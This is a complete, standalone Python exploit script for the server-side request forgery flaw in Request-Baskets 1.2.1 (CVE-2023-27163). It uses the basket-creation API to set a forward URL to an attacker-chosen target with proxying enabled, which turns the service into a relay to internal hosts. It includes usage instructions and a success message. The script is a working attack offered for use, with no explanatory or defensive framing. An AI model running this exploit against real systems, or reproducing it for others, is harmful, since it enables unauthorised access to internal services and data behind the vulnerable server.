import sys
import random
import string
import requests
import json

def main () :
    print("Exploit for SSRF vulnerability on Request-Baskets (1.2.1) (CVE-2023-27163).");
    if len(sys.argv) != 3 :
        print("Usage: python3 exploit.py <public_url> <targeted_url>")
        exit(1)

    random_str: str = ''.join(random.choices(string.ascii_lowercase, k=6));
    attack_url: str = sys.argv[1] + "/api/baskets/" + random_str;
    try :
        r = requests.post(
                attack_url,
                headers = {"Content-Type": "application/json"},
                data = json.dumps({
                    "forward_url": sys.argv[2],
                    "proxy_response": True,
                    "insecure_tls": False,
                    "expand_path": True,
                    "capacity": 250
                    }),
                timeout = 1
                );
        if r.status_code != 201 :
            raise Exception("Request returned 4XX value.")
    except Exception as e :
        print(F"Error: request failed.\nTraceback: {e}");
        exit(1);

    print("Exploit successfully executed.");
    print(F"Any request sent to {sys.argv[1] + '/' + random_str} will now be forwarded to the service on {sys.         argv[2]}.");
    exit(0);

if __name__ == "__main__" :
    main();